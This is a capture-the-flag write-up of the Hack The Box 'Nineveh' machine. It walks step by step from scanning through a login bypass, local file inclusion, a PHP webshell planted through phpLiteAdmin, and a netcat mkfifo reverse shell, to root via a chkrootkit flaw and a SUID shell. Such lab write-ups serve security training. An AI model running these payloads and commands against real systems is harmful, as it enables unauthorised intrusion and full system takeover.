Nmap
Gobuster
Bypassing login form
Exploitation
LFI
Exploitation
Post exploitation
Enumeration
Pspy
Privilege escalation
Welcome to the Nineveh writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Nineveh
tags: HTB
Medium
Linux
OSCP
Platform: Hackthebox
Difficult: Medium
S.O.: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
# nmap -p- -T4 10.10.10.43
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-19 08:47 CET
Nmap scan report for 10.10.10.43
Host is up (0.094s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 91.62 seconds
Now that we know the open ports, let's scan them in depth.
# nmap -A -Pn -p 80,443 10.10.10.43
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-19 08:57 CET
Nmap scan report for 10.10.10.43
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 93.65 ms 10.10.14.1
2 93.64 ms 10.10.10.43
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.99 seconds
Gobuster
# gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://nineveh.htb/ -x php,html,txt,bak -t 200 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://nineveh.htb/
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,txt,bak
[+] Timeout: 10s
===============================================================
2021/03/19 09:11:49 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.bak (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.bak (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/department (Status: 301)
/index.html (Status: 200)
/info.php (Status: 200)
/server-status (Status: 403)
===============================================================
2021/03/19 09:13:04 Finished
===============================================================
Well, we have found the info.php
file that executes phpinfo()
and the /department
directory where we access a login form in which, if we see the source code, we can see a commented line that lets us know of two possible users admin
and amrois
.
<!-- @admin! MySQL is been installed.. please fix the login page! ~amrois -->
Bypassing login form
As we can see, the form is vulnerable to the enumeration of users and entering the user admin
reports an incorrect password, so we will try to bypass adding []
to the password input from the browser inspector or Burp .
Once we have authenticated as admin
we can read that it has a note that says the following.
· Have you fixed the login page yet! hardcoded username and password is really bad idea!
· check your serect folder to get in! figure it out! this is your challenge
· Improve the db interface.
~amrois
Exploitation
LFI
If we click on Notes
from the top menu, we see that it is doing manage.php?Notes=files/ninevehNotes.txt
which we can surely use for an LFI. To check this, we can add any letter to the end of the file.
After doing several tests, I have been able to verify that we need to keep files/ninevehNotes
or else it filters the injection so, we should be able to do for exampleNotes=files/ninevehNotes.php/../../../../../../etc/passwd
and it should work.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
amrois:x:1000:1000:,,,:/home/amrois:/bin/bash
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
And with notes=files/ninevehNotes.php/../../../info.php
we can include for example the file info.php
After many unsuccessful tests with the LFI
, we will try to find the secret
directory mentioned in the note. In addition to looking for it in port 80
we will also look for it in port 443
since it is a different web server as we can see when accessing it.
# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://nineveh.htb/ -k -t 50 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://nineveh.htb/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/03/19 20:34:19 Starting gobuster
===============================================================
/db (Status: 301)
/server-status (Status: 403)
/secure_notes (Status: 301)
===============================================================
2021/03/19 20:42:04 Finished
===============================================================
Well, inside https://nineveh.htb/db/
we can find a phpLiteAdmin
and the secure_notes
path.
Inside the secure_notes
directory I don't find anything interesting but inside db
we have an access form that only requires a password, so by brute force I managed to get the password password123
to access.
Exploitation
As we can see in this link, the phpLiteAdmin
has a RCE
vulnerability. Let's attack it!
The first step is create a new database with a short name to use the LFI
with it at the last step.
Now, we need to create a new table with some name.
Well, inside it, we need to setup the column with some name
, with type
as text
and with the default value
as the payload <?php passthru($_REQUEST["cmd"]);?>
.
Perfect, as we can see in the database structure, the database file is in /var/tmp/a
Is time to use it with the LFI
.
http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.php/../../../../../../var/tmp/a&cmd=id
And... We got RCE! Let's go for the shell!
We are going to use the following shell encoded in URL
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.7 8787 >/tmp/f
And now, with a terminal listening, we access the URL.
http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.php/../../../../../../var/tmp/a&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.14.7%208787%20%3E%2Ftmp%2Ff
# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.43] 52156
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
Post exploitation
Enumeration
Pspy
By running pspy64
we can find the chkrootkit
script running every minute by root
. If we search the internet a bit, we can find a vulnerability in this script capable of giving us root
directly.
2021/03/21 12:20:02 CMD: UID=0 PID=10687 | /bin/sh /usr/bin/chkrootkit
Privilege escalation
To achieve the privilege scale, we are going to create a directory that is assigned the uid
of root
and we will save it in /var/tmp/suid
.
int main() {
setuid(0);
system("/bin/sh");
return 0;
}
Now, we are going to create the payload
as /tmp/update
with the following content and set it as executable.
www-data@nineveh:/tmp$ echo '#!/bin/bash' > /tmp/update; echo "chown root:root /var/tmp/suid; chmod 4755 /var/tmp/suid" >> /tmp/update
www-data@nineveh:/tmp$ chmod +x /tmp/update
Now we just have to wait for chkrootkit
to run and assign SUID permissions to our file.
www-data@nineveh:/var/tmp$ ls -la
total 48
drwxrwxrwt 5 root root 4096 Mar 21 12:52 .
drwxr-xr-x 14 root root 4096 Jul 2 2017 ..
-rwsr-xr-x 1 root root 16664 Mar 21 12:30 suid
www-data@nineveh:/var/tmp$ ./suid
# id
uid=0(root) gid=33(www-data) groups=33(www-data)
# cat /home/amrois/user.txt
CENSORED_FLAG
# cat /root/root.txt
CENSORED_FLAG
#